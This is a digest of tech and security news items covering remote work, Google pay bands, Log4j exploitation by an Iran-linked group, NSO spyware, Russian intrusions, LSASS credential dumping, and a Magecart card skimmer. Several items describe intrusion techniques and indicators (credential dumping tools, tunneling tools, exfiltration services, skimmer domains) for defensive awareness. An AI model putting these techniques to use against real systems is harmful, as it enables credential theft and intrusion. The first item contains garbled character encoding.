Bloomberg reports: A decade from now, offices shall be used for one thing and one thing only: quality time with colleagues. This seemingly bold prediction comes from Prithwiraj Choudhury, a Harvard Business School professor and expert on remote work. âoeWe will probably in 10 years stop calling this âremote workâ(TM). Weâ(TM)ll just call it work,â he said....

His research showed that a hybrid workforce is more productive, more loyal and less likely to leave. With companies from Twitter Inc. to PwC now giving employees the option to work virtually forever, Choudhury said businesses that donâ(TM)t adapt risk higher attrition... "For employers, itâ(TM)s a win as well because you are not constrained to hiring from the local labor market â" where you have an office... This is a once-in-a-generation moment when people are not going to be forced to live where they donâ(TM)t want to. Some people will find a permanent place to live; some will move around. The digital nomad revolution is going on...."

"We should not care about how many days or hours anyone works. Every job and task should have objective metrics, which are output based, and if an employee can perform those metrics in two days, so be it. I am a firm believer that we should stop counting time. We should give people the flexibility to work when they want to, whichever hours they want to, whichever days they want to, and care only about their work."

Protocol reports that Google "plans to reduce the equity packages for Durham, North Carolina; Des Moines, Iowa; and Houston, Texas, in January 2022, according to an Alphabet Workers Union petition circulating today that demands a reversion to pay and equity cuts." The Washington Post notes that "For some employees, that means their stock grants could be 25 percent lower than if they worked at other Google offices, like in Atlanta, the workers said in the letter."

With over 800 members the Alphabet Workers Union is part of a larger effort to organize workers at tech companies. Protocol writes: The Research Triangle area, where the Durham, North Carolina, office is located, was also moved from the "National" pay band to a "Discount" pay band in late 2020, according to the Amazon Workers Union petition. The union said it would affect 300 workers there, but that Google plans to expand to 1,000 employees in the coming years....

Many workers relocated there before the changes in pay and equity were made, the union wrote.

An anonymous reader quotes a report from Ars Technica: Hackers aligned with the government of Iran are exploiting the critical Log4j vulnerability to infect unpatched VMware users with ransomware, researchers said on Thursday. Security firm SentinelOne has dubbed the group TunnelVision. The name is meant to emphasize TunnelVision's heavy reliance on tunneling tools and the unique way it deploys them. In the past, TunnelVision has exploited so-called 1-day vulnerabilities -- meaning vulnerabilities that have been recently patched -- to hack organizations that have yet to install the fix. Vulnerabilities in Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell) are two of the group's better-known targets. [...] The SentinelOne research shows that the targeting continues and that this time the target is organizations running VMware Horizon, a desktop and app virtualization product that runs on Windows, macOS, and Linux.

Apache Tomcat is an open source Web server that VMware and other enterprise software use to deploy and serve Java-based Web apps. Once installed, a shell allows the hackers to remotely execute commands of their choice on exploited networks. The PowerShell used here appears to be a variant of this publicly available one. Once it's installed, TunnelVision members use it to: Execute reconnaissance commands; Create a backdoor user and adding it to the network administrators group; Harvest credentials using ProcDump, SAM hive dumps, and comsvcs MiniDump; and Download and run tunneling tools, including Plink and Ngrok, which are used to tunnel remote desktop protocol traffic.

The hackers use multiple legitimate services to achieve and obscure their activities. Those services include: transfer.sh, pastebin.com, webhook.site, ufile.io, and raw.githubusercontent.com. People who are trying to determine if their organization is affected should look for unexplained outgoing connections to these legitimate public services.

With people more wary than ever about clicking on suspicious links in emails and text messages, zero-click hacks are being used more frequently by government agencies to spy on activists, journalists and others, according to more than a dozen surveillance company employees, security researchers and hackers interviewed by Bloomberg News. From a report: Once the preserve of a few intelligence agencies, the technology needed for zero-click hacks is now being sold to governments by a small number of companies, the most prominent of which is Israel's NSO Group. Bloomberg News has learned that at least three other Israeli companies -- Paragon, Candiru and Cognyte Software -- have developed zero-click hacking tools or offered them to clients, according to former employees and partners of those companies, demonstrating that the technology is becoming more widespread in the surveillance industry.

There are certain steps that a potential victim can take that might reduce the chances of a successful zero-click attack, including keeping a device updated. But some of the more effective methods -- including uninstalling certain messaging apps that hackers can use as gateways to breach a device -- aren't practical because people rely on them for communication, said Bill Marczak, a senior research fellow at Citizen Lab, a research group at the University of Toronto that focuses on abuses of surveillance technology.

A single activist helped turn the tide against NSO Group, one of the world's most sophisticated spyware companies now facing a cascade of legal action and scrutiny in Washington over damaging new allegations that its software was used to hack government officials and dissidents around the world. It all started with a software glitch on her iPhone. Reuters: An unusual error in NSO's spyware allowed Saudi women's rights activist Loujain al-Hathloul and privacy researchers to discover a trove of evidence suggesting the Israeli spyware maker had helped hack her iPhone, according to six people involved in the incident. A mysterious fake image file within her phone, mistakenly left behind by the spyware, tipped off security researchers. The discovery on al-Hathloul's phone last year ignited a storm of legal and government action that has put NSO on the defensive. How the hack was initially uncovered is reported here for the first time. Al-Hathloul, one of Saudi Arabia's most prominent activists, is known for helping lead a campaign to end the ban on women drivers in Saudi Arabia. She was released from jail in February 2021 on charges of harming national security.

Soon after her release from jail, the activist received an email from Google warning her that state-backed hackers had tried to penetrate her Gmail account. Fearful that her iPhone had been hacked as well, al-Hathloul contacted the Canadian privacy rights group Citizen Lab and asked them to probe her device for evidence, three people close to al-Hathloul told Reuters. After six months of digging through her iPhone records, Citizen Lab researcher Bill Marczak made what he described as an unprecedented discovery: a malfunction in the surveillance software implanted on her phone had left a copy of the malicious image file, rather than deleting itself, after stealing the messages of its target. He said the finding, computer code left by the attack, provided direct evidence NSO built the espionage tool. "It was a game changer," said Marczak. "We caught something that the company thought was uncatchable." The discovery amounted to a hacking blueprint and led Apple to notify thousands of other state-backed hacking victims around the world, according to four people with direct knowledge of the incident.

The pandemic has accelerated the usage of QR codes, taking them from niche status to an essential tool for businesses and marketers. From a report: Look no further than Sunday's Super Bowl commercial of nothing but a floating QR code sending users to the website of Coinbase. [...] Law enforcement officials are sounding the alarm about the risks. The FBI issued an alert in January warning Americans that cybercriminals "are tampering with QR codes to redirect victims to malicious sites that steal login and financial information." If you're scanning a physical code, make sure it hasn't been tampered with. For example, watch out for "a sticker placed on top of the original code," the FBI advises.

Hackers backed by the Russian government have breached the networks of multiple US defense contractors in a sustained campaign that has revealed sensitive information about US weapons-development communications infrastructure, the federal government said on Wednesday. Wired reports: The campaign began no later than January 2020 and has continued through this month, according to a joint advisory by the FBI, the National Security Agency, and the Cybersecurity and Infrastructure Security Agency. The hackers have been targeting and successfully hacking cleared defense contractors, or CDCs, which support contracts for the US Department of Defense and intelligence community. "During this two-year period, these actors have maintained persistent access to multiple CDC networks, in some cases for at least six months," officials wrote in the advisory. "In instances when the actors have successfully obtained access, the FBI, NSA, and CISA have noted regular and recurring exfiltration of emails and data. For example, during a compromise in 2021, threat actors exfiltrated hundreds of documents related to the company's products, relationships with other countries, and internal personnel and legal matters."

The exfiltrated documents included unclassified CDC-proprietary and export-controlled information. This information gives the Russian government "significant insight" into US weapons-platforms development and deployment timelines, plans for communications infrastructure, and specific technologies being used by the US government and military. The documents also include unclassified emails among employees and their government customers discussing proprietary details about technological and scientific research.

The hackers have used a variety of methods to breach their targets. The methods include harvesting network passwords through spear phishing, data breaches, cracking techniques, and exploitation of unpatched software vulnerabilities. After gaining a toehold in a targeted network, the threat actors escalate their system rights by mapping the Active Directory and connecting to domain controllers. From there, they're able to exfiltrate credentials for all other accounts and create new accounts. The hackers make use of virtual private servers to encrypt their communications and hide their identities, the advisory added. They also use "small office and home office (SOHO) devices, as operational nodes to evade detection."

Five major Canadian banks went offline for hours blocking access to online and mobile banking as well as e-transfers for customers. From a report: The banks reportedly hit by the outage include Royal Bank of Canada (RBC), BMO (Bank of Montreal), Scotiabank, and the Canadian Imperial Bank of Commerce (CIBC). Canada's five major banks went offline yesterday impeding access to e-Transfers, online and mobile banking services for many.

Underneath the gaming platform worth $68 billion and used by over half of all children in America is a ballooning and highly profitable ecosystem of hackers and traders. From a report: Motherboard spoke to 11 people connected to Roblox beaming (Roblox slang for getting hacked and your items stolen), including victims, the people who administer the marketplaces where people then sell Roblox items, and hackers themselves. There's a ballooning and highly profitable ecosystem where hackers stand to steal tens of thousands of dollars worth of items in minutes, with many victims including children. The sketchy, and sometimes illicit, economy sits in the shadow of Roblox's legitimate business, which is worth $68 billion and which half of all children in the U.S. play on in some form. One beamer called Max told Motherboard how he targets many of these victims. "I go to servers with rich idiots, then message every single one of them," he said.

Roblox isn't a single game but a free application players download onto their PC, phone, or Xbox games console. From there, they can access tens of millions of different games, or as Roblox calls them, "experiences," made by members of the wider Roblox community and player base. At the time of this writing, popular Roblox games include Murder Mystery 2, where players try to identify the killer; Pet Simulator X, for players who want to take care of and trade pets; and Hide and Seek Extreme.

"Akamai, which announced quarterly earnings today, also announced that they plan to acquire longtime Linux VPS host Linode for $900 million," writes Slashdot reader virtig01. From a press release announcing the acquisition: Akamai Technologies, the world's most trusted solution to power and protect digital experiences, today announced it has entered into a definitive agreement to acquire Linode, one of the easiest-to-use and most trusted infrastructure-as-a-service (IaaS) platform providers. [...] Under terms of the agreement, Akamai has agreed to acquire all of the outstanding equity of Linode Limited Liability Company for approximately $900 million, after customary purchase price adjustments. As a result of structuring the transaction as an asset purchase, Akamai expects to achieve cash income tax savings over the next 15 years that have an estimated net present value of approximately $120 million. The transaction is expected to close in the first quarter of 2022 and is subject to customary closing conditions.

Christopher Aker, founder and chief executive officer, Linode, added, "We started Linode 19 years ago to make the power of the cloud easier and more accessible. Along the way, we built a cloud computing platform trusted by developers and businesses around the world. Today, those customers face new challenges as cloud services become all-encompassing, including compute, storage, security and delivery from core to edge. Solving those challenges requires tremendous integration and scale which Akamai and Linode plan to bring together under one roof. This marks an exciting new chapter for Linode and a major step forward for our current and future customers."

New analysis suggests that 74% of all money made through ransomware attacks in 2021 went to Russia-linked hackers. The BBC reports: Researchers say more than $400 million worth of crypto-currency payments went to groups "highly likely to be affiliated with Russia." Russia has denied accusations that it is harboring cyber-criminals. Researchers also claim "a huge amount of crypto-currency-based money laundering" goes through Russian crypto-companies. Chainalysis, which carried out the research, said it was able to follow the flow of money to and from the digital wallets of known hacking groups using public blockchain transaction records.

In the Chainalysis report, it's highlighted that 9.9% of all known ransomware revenue is going to Evil Corp - an alleged cyber-crime group which the US has issued sanctions and indictments against, but who are operating in Russia with apparent impunity. A BBC investigation in November found that Igor Turashev, one of the accused leaders of Evil Corp, is operating several businesses out of Moscow City's Federation Tower. The tower is one of Russia's most prestigious addresses, home to prominent businesses and with apartments going for millions of dollars. Chainalysis claims several crypto-currency companies based in the tower were used by hackers to launder illicit funds, turning crypto-currency from digital wallet addresses to mainstream money. "In any given quarter, the illicit and risky addresses account for between 29% and 48% of all funds received by Moscow City crypto-currency businesses," researchers allege.

Ukraine's Ministry of Defense website suffered from what appeared to be a distributed denial of service attack Tuesday, according to the government's Facebook account. CNET reports: The military's website remained unavailable as of 12 p.m. PT Tuesday, with the Ukrainian military's Facebook account saying work is currently underway to restore regular functioning to the online portal. The nation's largest commercial bank, PrivatBank, has also been subjected to a "massive DDoS attack" for the past few hours, according to the Ukraine Center for Strategic Communications. There's no threat to customer funds stored at the bank, it said, though the attack is preventing customers from accessing the Privat24 application and viewing their balances. Online banking with Oschadbank is also down, the Center for Strategic Communications said, as reported earlier by Vice. Nobody has yet to be blamed for the attack, but as CNET notes, "it comes after Russia is believed to have mounted multiple cyberattacks on Ukraine as part of efforts that security experts say are designed to destabilize the country's government and economy."

UPDATE (2/16/2022): America's Undersecretary of State said Wednesday that "While we're still investigating and doing forensics along with the Ukrainians, I think what's most important is that these cyberattacks were not very successful," reports CNN, which adds that the official "credited Ukrainian officials for responding quickly and helping the websites recover."

NSO Group's controversial Pegasus spyware should be banned in the European Union, the bloc's in-house privacy watchdog warned on Tuesday. From a report: "The ban on the development and the deployment of spyware with the capability of Pegasus in the EU would be the most effective option to protect our fundamental rights and freedoms," the European Data Protection Supervisor said in a statement on Tuesday. The warning comes amid increasing scrutiny of abuses of surveillance technologies meant to help intelligence and law enforcement agencies fight serious crime and terrorism. While the EU regulator doesn't make decisions for member countries, its influence at the top echelons of the bloc's institutions may encourage other authorities to crack down on surveillance software.

Microsoft is enabling a Microsoft Defender 'Attack Surface Reduction' security rule by default to block hackers' attempts to steal Windows credentials from the LSASS process. BleepingComputer reports: When threat actors compromise a network, they attempt to spread laterally to other devices by stealing credentials or using exploits. One of the most common methods to steal Windows credentials is to gain admin privileges on a compromised device and then dump the memory of the Local Security Authority Server Service (LSASS) process running in Windows. This memory dump contains NTLM hashes of Windows credentials of users who had logged into the computer that can be brute-forced for clear-text passwords or used in Pass-the-Hash attacks to login into other devices. While Microsoft Defender block programs like Mimikatz, a LSASS memory dump can still be transferred to a remote computer to dump credentials without fear of being blocked.

To prevent threat actors from abusing LSASS memory dumps, Microsoft has introduced security features that prevent access to the LSASS process. One of these security features is Credential Guard, which isolates the LSASS process in a virtualized container that prevents other processes from accessing it. However, this feature can lead to conflicts with drivers or applications, causing some organizations not to enable it. As a way to mitigate Windows credential theft without causing the conflicts introduced by Credential Guard, Microsoft will soon be enabling a Microsoft Defender Attack Surface Reduction (ASR) rule by default. The rule, ' Block credential stealing from the Windows local security authority subsystem,' prevents processes from opening the LSASS process and dumping its memory, even if it has administrative privileges.

While enabling the ASR rule by default will significantly impact the stealing of Windows credentials, it is not a silver bullet by any means. This is because the full Attack Surface Reduction feature is only supported on Windows Enterprise licenses running Microsoft Defender as the primary antivirus. However, BleepingComputer's tests show that the LSASS ASR rule also works on Windows 10 and Windows 11 Pro clients. Unfortunately, once another antivirus solution is installed, ASR is immediately disabled on the device. Furthermore, security researchers have discovered built-in Microsoft Defender exclusion paths allowing threat actors to run their tools from those filenames/directories to bypass the ASR rules and continue to dump the LSASS process. Mimikatz developer Benjamin Delpy told BleepingComputer that Microsoft probably added these built-in exclusions for another rule, but as exclusions affect ALL rules, it bypasses the LSASS restriction.

DevNull127 writes: More bad news for Spotify from Conde Naste via their music site Pitchfork:

Last month, in the tone of a band reluctantly summoned from some deep seabed, My Bloody Valentine issued a prickly public service announcement: "Just noticed that Spotify has put fake lyrics up for our songs without our knowledge," the Irish shoegazers tweeted. "These lyrics are actually completely incorrect and insulting." Cocteau Twins' Simon Raymonde chimed in to report that they, too, had found gibberish transcriptions of their famously elliptical songs on streaming services.

The lyric snafu was not limited to Spotify. Over the past decade, a data platform called Musixmatch has assumed dominion over the world of lyrics, securing sub-licensing deals with the major publishing companies. The lyrics you see on Spotify, Tidal, and Amazon Music usually come through Musixmatch, via a data pipeline that links the platform's enormous transcriber community with a small core of paid quality-control monitors. (Apple Music has a dedicated lyrics team handling most of its transcriptions.)

The affair illustrates tech capitalism's discombobulation when faced with a key element in art, which is the inexplicable. I think the problem, though, is not Musixmatch and its protocol so much as the service's unilateral rollout, with quasi-official imprimatur, on platforms already under fire for flattening artistic identity and repackaging music as scaleable content. Having sub-licensed the rights, Musixmatch is perfectly entitled to crowd-source transcriptions and sell them on. But artists should know whose words are being put in their mouths—and that, should they wish, they have the right to opt out.

An academic research project found that thousands of JavaScript developers are using an email address with an expired domain for their npm accounts, leaving their projects exposed to easy hijacks. From a report: The study, performed last year by researchers from Microsoft and North Caroline State University, analyzed the metadata of 1,630,101 libraries uploaded on Node Package Manager (npm), the de-facto repository for JavaScript libraries and the largest package repository on the internet. Researchers said they found that 2,818 project maintainers were still using an email address for their accounts that had an expired domain, some of which they found on sale on sites like GoDaddy. The team argued that attackers could buy these domains, re-register the maintainer's address on their own email servers, and then reset the maintainer's account password and take over his npm packages.

Web browser company Opera said Monday it will enable emoji-only based web addresses "to bring a new level of creativity to the internet." From a report: The integration is part of a partnership with Yat, a company that sells URLs with strings of emoji in them. "It's been almost 30 years since the world wide web launched to the public, and there hasn't been much innovation in the weblink space: people still include .com in their URLs," Jorgen Arnesen, executive vice president of mobile at Opera, said in a press release.

ZDNet reports: Cyber criminals are increasingly targeting Linux servers and cloud infrastructure to launch ransomware campaigns, cryptojacking attacks and other illicit activity — and many organisations are leaving themselves open to attacks because Linux infrastructure is misconfigured or poorly managed. Analysis from cybersecurity researchers at VMware warns that malware targeting Linux-based systems is increasing in volume and complexity, while there's also a lack of focus on managing and detecting threats against them.

This comes after an increase in the use of enterprises relying on cloud-based services because of the rise of hybrid working, with Linux the most common operating system in these environments. That rise has opened new avenues that cyber criminals can exploit to compromise enterprise networks, as detailed by the research paper, including ransomware and cryptojacking attacks tailored to target Linux servers in environments that might not be as strictly monitored as those running Windows. These attacks are designed for maximum impact, as the cyber criminals look to compromise as much as the network as possible before triggering the encryption process and ultimately demanding a ransom for the decryption key.

The report warns that ransomware has evolved to target Linux host images used to spin up workloads in virtualised environments, enabling the attackers to simultaneously encrypt vast swathes of the network and make incident response more difficult. The attacks on cloud environments also result in attackers stealing information from servers, which they threaten to publish if they're not paid a ransom.... Cryptojacking and other malware attacks are also increasingly targeting Linux servers. Cryptojacking malware steals processing power from CPUs and servers in order to mine for cryptocurrency....

Many of the cyberattacks targeting Linux environments are still relatively unsophisticated when compared with equivalent attacks targeting Windows systems — that means that with the correct approach to monitoring and securing Linux-based systems, many of these attacks can be prevented. That includes cybersecurity hygiene procedures such as ensuring default passwords aren't in use and avoiding sharing one account across multiple users.

America's Cybersecurity and Infrastructure Agency (CISA) "says that American companies should be extra wary about potential hacking attempts from Russia as tensions with the country rise," reports PC Magazine: Even if Russia doesn't invade Ukraine, it has often targeted the country with what Wired has characterized as "many of the most costly cyberattacks in history." Those attacks might not always be confined to Ukraine, however, which is where CISA's new Shields Up campaign comes in.... CISA says that it "recommends all organizations — regardless of size — adopt a heightened posture when it comes to cybersecurity and protecting their most critical assets." It also says that it's collaborated with its "critical infrastructure partners" to raise awareness of these risks.

The agency wants everyone to "reduce the likelihood of a damaging cyber intrusion," "take steps to quickly detect a potential intrusion," "ensure that the organization is prepared to respond if an intrusion occurs," and "maximize the organization's resilience to a destructive cyber incident." CISA offers advice related to each of those focus areas on its website.
Earlier this week CISA also added 15 "known exploited" vulnerabilities to its catalog, ZDNet reports, in products from Apache, Apple, Jenkins, and Microsoft: The list includes a Microsoft Windows SAM local privilege escalation vulnerability with a remediation date set for February 24. Vulcan Cyber engineer Mike Parkin said the vulnerability — CVE-2021-36934 — was patched in August 2021 shortly after it was disclosed. "It is a local vulnerability, which reduces the risk of attack and gives more time to deploy the patch. CISA set the due date for Federal organizations who take direction from them, and that date is based on their own risk criteria," Parkin said. "With Microsoft releasing the fix 5 months ago, and given the relative threat, it is reasonable for them to set late February as the deadline."

An anonymous reader quotes a report from Ars Technica, written by Dan Goodin: About 500 e-commerce websites were recently found to be compromised by hackers who installed a credit card skimmer that surreptitiously stole sensitive data when visitors attempted to make a purchase. A report published on Tuesday is only the latest one involving Magecart, an umbrella term given to competing crime groups that infect e-commerce sites with skimmers. Over the past few years, thousands of sites have been hit by exploits that cause them to run malicious code. When visitors enter payment card details during purchase, the code sends that information to attacker-controlled servers.

Sansec, the security firm that discovered the latest batch of infections, said the compromised sites were all loading malicious scripts hosted at the domain naturalfreshmall[.]com. "The Natural Fresh skimmer shows a fake payment popup, defeating the security of a (PCI compliant) hosted payment form," firm researchers wrote on Twitter. "Payments are sent to https://naturalfreshmall.com/p...." The hackers then modified existing files or planted new files that provided no fewer than 19 backdoors that the hackers could use to retain control over the sites in the event the malicious script was detected and removed and the vulnerable software was updated. The only way to fully disinfect the site is to identify and remove the backdoors before updating the vulnerable CMS that allowed the site to be hacked in the first place.

Sansec worked with the admins of hacked sites to determine the common entry point used by the attackers. The researchers eventually determined that the attackers combined a SQL injection exploit with a PHP object injection attack in a Magento plugin known as Quickview. [...] It's not hard to find sites that remain infected more than a week after Sansec first reported the campaign on Twitter. At the time this post was going live, Bedexpress[.]com continued to contain this HTML attribute, which pulls JavaScript from the rogue naturalfreshmall[.]com domain. The hacked sites were running Magento 1, a version of the e-commerce platform that was retired in June 2020. The safer bet for any site still using this deprecated package is to upgrade to the latest version of Adobe Commerce. Another option is to install open source patches available for Magento 1 using either DIY software from the OpenMage project or with commercial support from Mage-One.